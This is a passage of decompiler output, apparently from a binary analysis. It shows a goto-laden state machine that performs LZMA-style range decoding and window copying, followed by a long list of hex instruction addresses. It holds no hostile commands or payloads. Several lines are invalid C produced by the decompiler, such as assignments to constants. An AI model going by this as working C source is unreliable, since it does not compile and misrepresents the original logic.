                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t365 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t365;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												goto L111;
                                                                                                                                                                                      											case 0x11:
                                                                                                                                                                                      												goto L69;
                                                                                                                                                                                      											case 0x12:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      													 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                      													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                      														L132:
                                                                                                                                                                                      														 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      														goto L133;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                      												goto L130;
                                                                                                                                                                                      											case 0x13:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      													_t469 = __ebp - 0x58;
                                                                                                                                                                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                      													__eflags =  *_t469;
                                                                                                                                                                                      													 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                      													 *(__ebp - 0x40) = 8;
                                                                                                                                                                                      													L144:
                                                                                                                                                                                      													 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                      													goto L145;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      												 *(__ebp - 0x30) = 8;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                      												L130:
                                                                                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      												 *(__ebp - 0x40) = 3;
                                                                                                                                                                                      												goto L144;
                                                                                                                                                                                      											case 0x14:
                                                                                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x80);
                                                                                                                                                                                      												 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                      												goto L1;
                                                                                                                                                                                      											case 0x15:
                                                                                                                                                                                      												__eax = 0;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      												__al = __al & 0x000000fd;
                                                                                                                                                                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      												goto L120;
                                                                                                                                                                                      											case 0x16:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      												__eflags = __eax - 4;
                                                                                                                                                                                      												if(__eax >= 4) {
                                                                                                                                                                                      													_push(3);
                                                                                                                                                                                      													_pop(__eax);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                                                                                      												 *(__ebp - 0x40) = 6;
                                                                                                                                                                                      												__eax = __eax << 7;
                                                                                                                                                                                      												 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      												goto L145;
                                                                                                                                                                                      											case 0x17:
                                                                                                                                                                                      												L145:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      												 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                      												goto L149;
                                                                                                                                                                                      											case 0x18:
                                                                                                                                                                                      												L146:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												_t484 = __ebp - 0x70;
                                                                                                                                                                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      												__eflags =  *_t484;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      												L148:
                                                                                                                                                                                      												_t487 = __ebp - 0x48;
                                                                                                                                                                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      												__eflags =  *_t487;
                                                                                                                                                                                      												L149:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                      													__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                      													0 = 1;
                                                                                                                                                                                      													__eax = 1 << __cl;
                                                                                                                                                                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                      														 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                      														goto L1;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x50);
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      												__esi = __edx + __eax;
                                                                                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      												__ax =  *__esi;
                                                                                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      													__cx = __ax;
                                                                                                                                                                                      													__cx = __ax >> 5;
                                                                                                                                                                                      													__eax = __eax - __ecx;
                                                                                                                                                                                      													__edx = __edx + 1;
                                                                                                                                                                                      													__eflags = __edx;
                                                                                                                                                                                      													 *__esi = __ax;
                                                                                                                                                                                      													 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                      													 *__esi = __cx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													goto L148;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L146;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											case 0x19:
                                                                                                                                                                                      												__eflags = __ebx - 4;
                                                                                                                                                                                      												if(__ebx < 4) {
                                                                                                                                                                                      													 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                      													L119:
                                                                                                                                                                                      													_t393 = __ebp - 0x2c;
                                                                                                                                                                                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                      													__eflags =  *_t393;
                                                                                                                                                                                      													L120:
                                                                                                                                                                                      													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													if(__eax == 0) {
                                                                                                                                                                                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                      														goto L170;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                      													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                      														goto L171;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                      													__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      													_t400 = __ebp - 0x60;
                                                                                                                                                                                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                      													__eflags =  *_t400;
                                                                                                                                                                                      													goto L123;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx = __ebx;
                                                                                                                                                                                      												__eax = __ebx;
                                                                                                                                                                                      												__ecx = __ebx >> 1;
                                                                                                                                                                                      												__eax = __ebx & 0x00000001;
                                                                                                                                                                                      												__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                      												__al = __al | 0x00000002;
                                                                                                                                                                                      												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                      												__eflags = __ebx - 0xe;
                                                                                                                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      												if(__ebx >= 0xe) {
                                                                                                                                                                                      													__ebx = 0;
                                                                                                                                                                                      													 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                      													L102:
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                      													if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                      														__eax = __eax + __ebx;
                                                                                                                                                                                      														 *(__ebp - 0x40) = 4;
                                                                                                                                                                                      														 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      														__eax =  *(__ebp - 4);
                                                                                                                                                                                      														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                      														__eflags = __eax;
                                                                                                                                                                                      														L108:
                                                                                                                                                                                      														__ebx = 0;
                                                                                                                                                                                      														 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      														 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      														 *(__ebp - 0x44) = 0;
                                                                                                                                                                                      														 *(__ebp - 0x48) = 0;
                                                                                                                                                                                      														L112:
                                                                                                                                                                                      														__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                      															_t391 = __ebp - 0x2c;
                                                                                                                                                                                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                      															__eflags =  *_t391;
                                                                                                                                                                                      															goto L119;
                                                                                                                                                                                      														}
                                                                                                                                                                                      														__eax =  *(__ebp - 0x50);
                                                                                                                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                      														__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      														__esi = __edi + __eax;
                                                                                                                                                                                      														 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      														__ax =  *__esi;
                                                                                                                                                                                      														__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                      														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                      														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                      															__ecx = 0;
                                                                                                                                                                                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                      															__ecx = 1;
                                                                                                                                                                                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                      															__ebx = 1;
                                                                                                                                                                                      															__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                      															__ebx = 1 << __cl;
                                                                                                                                                                                      															__ecx = 1 << __cl;
                                                                                                                                                                                      															__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                      															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                      															__cx = __ax;
                                                                                                                                                                                      															__cx = __ax >> 5;
                                                                                                                                                                                      															__eax = __eax - __ecx;
                                                                                                                                                                                      															__edi = __edi + 1;
                                                                                                                                                                                      															__eflags = __edi;
                                                                                                                                                                                      															 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      															 *__esi = __ax;
                                                                                                                                                                                      															 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                      															0x800 = 0x800 - __ecx;
                                                                                                                                                                                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                      															 *__esi = __dx;
                                                                                                                                                                                      														}
                                                                                                                                                                                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      															L111:
                                                                                                                                                                                      															_t368 = __ebp - 0x48;
                                                                                                                                                                                      															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                      															__eflags =  *_t368;
                                                                                                                                                                                      															goto L112;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															goto L109;
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                      														__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                      														__ebx = __ebx | 0x00000001;
                                                                                                                                                                                      														__eflags = __ebx;
                                                                                                                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      														L101:
                                                                                                                                                                                      														_t338 = __ebp - 0x48;
                                                                                                                                                                                      														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      														__eflags =  *_t338;
                                                                                                                                                                                      														goto L102;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L99;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__edx =  *(__ebp - 4);
                                                                                                                                                                                      												__eax = __eax - __ebx;
                                                                                                                                                                                      												 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                      												goto L108;
                                                                                                                                                                                      											case 0x1a:
                                                                                                                                                                                      												L56:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                      												__al =  *(__ebp - 0x5c);
                                                                                                                                                                                      												__edx =  *(__ebp - 8);
                                                                                                                                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                      												 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                      												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                      												__eax = __ecx + 1;
                                                                                                                                                                                      												__edx = 0;
                                                                                                                                                                                      												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      												__edx = _t192;
                                                                                                                                                                                      												goto L80;
                                                                                                                                                                                      											case 0x1b:
                                                                                                                                                                                      												L76:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__edx =  *(__ebp - 8);
                                                                                                                                                                                      												__cl =  *(__eax + __edx);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                      												 *(__eax + __edx) = __cl;
                                                                                                                                                                                      												__eax = __eax + 1;
                                                                                                                                                                                      												__edx = 0;
                                                                                                                                                                                      												_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      												__edx = _t275;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x68);
                                                                                                                                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      												_t284 = __ebp - 0x64;
                                                                                                                                                                                      												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                      												__eflags =  *_t284;
                                                                                                                                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                      												L80:
                                                                                                                                                                                      												 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                      												goto L81;
                                                                                                                                                                                      											case 0x1c:
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													L123:
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                      													if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      														break;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      														__eflags = __eax;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__edx =  *(__ebp - 8);
                                                                                                                                                                                      													__cl =  *(__eax + __edx);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      													 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                      													 *(__eax + __edx) = __cl;
                                                                                                                                                                                      													__eax = __eax + 1;
                                                                                                                                                                                      													__edx = 0;
                                                                                                                                                                                      													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      													__edx = _t414;
                                                                                                                                                                                      													__eax =  *(__ebp - 0x68);
                                                                                                                                                                                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x30);
                                                                                                                                                                                      													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                      													 *(__ebp - 0x14) = _t414;
                                                                                                                                                                                      													if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                                      														continue;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														L81:
                                                                                                                                                                                      														 *(__ebp - 0x88) = 2;
                                                                                                                                                                                      														goto L1;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L171:
                                                                                                                                                                                      									_t535 = _t534 | 0xffffffff;
                                                                                                                                                                                      									goto L172;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}













                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406eaf
                                                                                                                                                                                      0x00406eaf
                                                                                                                                                                                      0x00406eb3
                                                                                                                                                                                      0x00406ec0
                                                                                                                                                                                      0x00406eca
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406eb5
                                                                                                                                                                                      0x00406eb5
                                                                                                                                                                                      0x00406ef0
                                                                                                                                                                                      0x00406ef3
                                                                                                                                                                                      0x00406ef6
                                                                                                                                                                                      0x00406ef9
                                                                                                                                                                                      0x00406ef9
                                                                                                                                                                                      0x00406efc
                                                                                                                                                                                      0x00406f03
                                                                                                                                                                                      0x00406f08
                                                                                                                                                                                      0x00406de9
                                                                                                                                                                                      0x00406dec
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00407161
                                                                                                                                                                                      0x00407161
                                                                                                                                                                                      0x00407161
                                                                                                                                                                                      0x00407167
                                                                                                                                                                                      0x0040716d
                                                                                                                                                                                      0x00407173
                                                                                                                                                                                      0x0040718d
                                                                                                                                                                                      0x00407190
                                                                                                                                                                                      0x00407196
                                                                                                                                                                                      0x004071a1
                                                                                                                                                                                      0x004071a3
                                                                                                                                                                                      0x00407175
                                                                                                                                                                                      0x00407175
                                                                                                                                                                                      0x00407184
                                                                                                                                                                                      0x00407188
                                                                                                                                                                                      0x00407188
                                                                                                                                                                                      0x004071ad
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071af
                                                                                                                                                                                      0x004071b3
                                                                                                                                                                                      0x00407362
                                                                                                                                                                                      0x00407378
                                                                                                                                                                                      0x00407380
                                                                                                                                                                                      0x00407387
                                                                                                                                                                                      0x00407389
                                                                                                                                                                                      0x00407390
                                                                                                                                                                                      0x00407394
                                                                                                                                                                                      0x00407394
                                                                                                                                                                                      0x004071bf
                                                                                                                                                                                      0x004071c6
                                                                                                                                                                                      0x004071ce
                                                                                                                                                                                      0x004071d1
                                                                                                                                                                                      0x004071d4
                                                                                                                                                                                      0x004071d4
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00406976
                                                                                                                                                                                      0x00406976
                                                                                                                                                                                      0x00406976
                                                                                                                                                                                      0x0040697f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406985
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406990
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406999
                                                                                                                                                                                      0x0040699c
                                                                                                                                                                                      0x0040699f
                                                                                                                                                                                      0x004069a3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004069a9
                                                                                                                                                                                      0x004069ac
                                                                                                                                                                                      0x004069ae
                                                                                                                                                                                      0x004069af
                                                                                                                                                                                      0x004069b2
                                                                                                                                                                                      0x004069b4
                                                                                                                                                                                      0x004069b5
                                                                                                                                                                                      0x004069b7
                                                                                                                                                                                      0x004069ba
                                                                                                                                                                                      0x004069bf
                                                                                                                                                                                      0x004069c4
                                                                                                                                                                                      0x004069cd
                                                                                                                                                                                      0x004069e0
                                                                                                                                                                                      0x004069e3
                                                                                                                                                                                      0x004069ef
                                                                                                                                                                                      0x00406a17
                                                                                                                                                                                      0x00406a19
                                                                                                                                                                                      0x00406a27
                                                                                                                                                                                      0x00406a27
                                                                                                                                                                                      0x00406a2b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a1b
                                                                                                                                                                                      0x00406a1b
                                                                                                                                                                                      0x00406a1e
                                                                                                                                                                                      0x00406a1f
                                                                                                                                                                                      0x00406a1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a1b
                                                                                                                                                                                      0x004069f5
                                                                                                                                                                                      0x004069fa
                                                                                                                                                                                      0x004069fa
                                                                                                                                                                                      0x00406a03
                                                                                                                                                                                      0x00406a0b
                                                                                                                                                                                      0x00406a0e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a14
                                                                                                                                                                                      0x00406a14
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a14
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a31
                                                                                                                                                                                      0x00406a31
                                                                                                                                                                                      0x00406a35
                                                                                                                                                                                      0x004072e1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072e1
                                                                                                                                                                                      0x00406a3e
                                                                                                                                                                                      0x00406a4e
                                                                                                                                                                                      0x00406a51
                                                                                                                                                                                      0x00406a54
                                                                                                                                                                                      0x00406a54
                                                                                                                                                                                      0x00406a54
                                                                                                                                                                                      0x00406a57
                                                                                                                                                                                      0x00406a5b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a5d
                                                                                                                                                                                      0x00406a63
                                                                                                                                                                                      0x00406a8d
                                                                                                                                                                                      0x00406a93
                                                                                                                                                                                      0x00406a9a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a9a
                                                                                                                                                                                      0x00406a69
                                                                                                                                                                                      0x00406a6c
                                                                                                                                                                                      0x00406a71
                                                                                                                                                                                      0x00406a71
                                                                                                                                                                                      0x00406a7c
                                                                                                                                                                                      0x00406a84
                                                                                                                                                                                      0x00406a87
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406acc
                                                                                                                                                                                      0x00406ad2
                                                                                                                                                                                      0x00406ad5
                                                                                                                                                                                      0x00406ae2
                                                                                                                                                                                      0x00406aea
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406aa1
                                                                                                                                                                                      0x00406aa1
                                                                                                                                                                                      0x00406aa5
                                                                                                                                                                                      0x004072f0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072f0
                                                                                                                                                                                      0x00406ab1
                                                                                                                                                                                      0x00406abc
                                                                                                                                                                                      0x00406abc
                                                                                                                                                                                      0x00406abc
